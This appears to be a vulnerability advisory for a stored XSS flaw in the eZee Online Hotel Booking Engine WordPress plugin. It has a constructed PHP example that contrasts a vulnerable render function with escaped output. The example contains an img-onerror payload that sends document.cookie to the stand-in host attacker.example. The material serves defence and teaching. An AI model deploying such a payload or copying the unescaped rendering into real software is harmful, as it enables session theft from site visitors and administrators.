Impact
The eZee Online Hotel Booking Engine plugin for WordPress contains a stored cross‑site scripting (XSS) flaw: user‑supplied input is not properly neutralized before it is written into generated web pages, an instance of CWE‑79 (Improper Neutralization of Input During Web Page Generation). An attacker who gets a JavaScript payload saved into a field the plugin persists to the database has that payload rendered, unescaped, to every later visitor of the affected page. Because the script then runs in the site's own origin, it can read session cookies that are not marked HttpOnly, issue requests with the victim's authenticated session, deface the page, or redirect the visitor elsewhere. The impact is on the confidentiality and integrity of anyone who views affected pages; the flaw does not by itself give the attacker access to the server or the underlying system.
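The pattern behind a CWE‑79 stored XSS, and the WordPress‑idiomatic fix, as an added example. This is not code from the eZee plugin or the advisory; the "special requests" booking field, the rendering functions and the payload are all hypothetical and constructed here. The `esc_html()`, `esc_attr()` and `sanitize_text_field()` fallbacks are only defined when the real WordPress helpers are absent, so the file runs with the plain `php` CLI and behaves the same inside WordPress.

```php
<?php
// Added example (not the plugin's own code). Models a hypothetical booking
// "special requests" field that is stored and later rendered in a table.

// Fallbacks so this runs outside WordPress; in WordPress the core helpers win.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    // Rough stand-in for WordPress's sanitize_text_field(): drop tags,
    // control characters and surrounding whitespace.
    function sanitize_text_field($str) {
        $str = strip_tags((string) $str);
        $str = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $str);
        return trim($str);
    }
}

// Constructed payload an attacker could submit through a booking form.
// attacker.example is a placeholder host, not a real indicator.
$submitted = 'Late arrival <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable path (CWE-79): the stored value is concatenated straight into
// HTML. Every visitor or admin who views the booking runs the onerror handler.
function render_request_vulnerable($stored) {
    return '<td class="special-requests">' . $stored . '</td>';
}

// Hardened path: sanitize on input as defence in depth, and escape on output
// for the exact context the value lands in (HTML text body vs. attribute).
function store_request($raw) {
    return sanitize_text_field($raw);
}
function render_request_hardened($stored) {
    return '<td class="special-requests" data-request="' . esc_attr($stored) . '">'
        . esc_html($stored) . '</td>';
}

$stored_vuln = $submitted;                 // what a naive plugin saves
$stored_safe = store_request($submitted);  // what the hardened path saves

echo "Vulnerable output:\n" . render_request_vulnerable($stored_vuln) . "\n\n";
echo "Hardened output:\n" . render_request_hardened($stored_safe) . "\n\n";

// Even if input sanitization is bypassed (e.g. the row is written to the DB
// by another code path), escaping at output alone keeps the markup inert.
echo "Escaped raw payload:\n" . render_request_hardened($stored_vuln) . "\n";
```

The check a reviewer applies to a plugin like this is the last case: take a value that reached the database without sanitization and confirm that every place it is echoed passes through a context‑appropriate escaper (`esc_html()` for text nodes, `esc_attr()` for attribute values, `esc_url()` for `href`/`src`, `wp_kses_post()` where limited HTML is intentional). Input filtering alone is not a fix, because stored data can arrive by paths other than the form that was filtered.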
Affected Systems
The vulnerability exists in all releases of the eZee Online Hotel Booking Engine plugin up to version 1.0.0; any WordPress site with the plugin installed and active is affected. According to the description, the exposed surface is the data the plugin stores and later displays, which covers both the front‑end booking forms and the administrative screens where submitted booking data is saved and shown.
Risk and Exploitability
A CVSS base score of 5.9 places the issue in the medium severity band. Its EPSS score is below 1 %, meaning a low estimated probability of exploitation in the wild over the next 30 days, and the plugin is not in the CISA Known Exploited Vulnerabilities (KEV) catalog, so no confirmed active exploitation has been recorded there. From the description it is inferred that the attacker must be able to submit data the plugin stores, for example through a booking form or an administrative entry, in order to plant the payload. The attack vector is the web application itself: the payload is delivered through the plugin's own input paths, and it executes in the browser of any user who loads a page that renders the stored value, which includes administrators when that value is shown in a back‑end screen.
OpenCVE Enrichment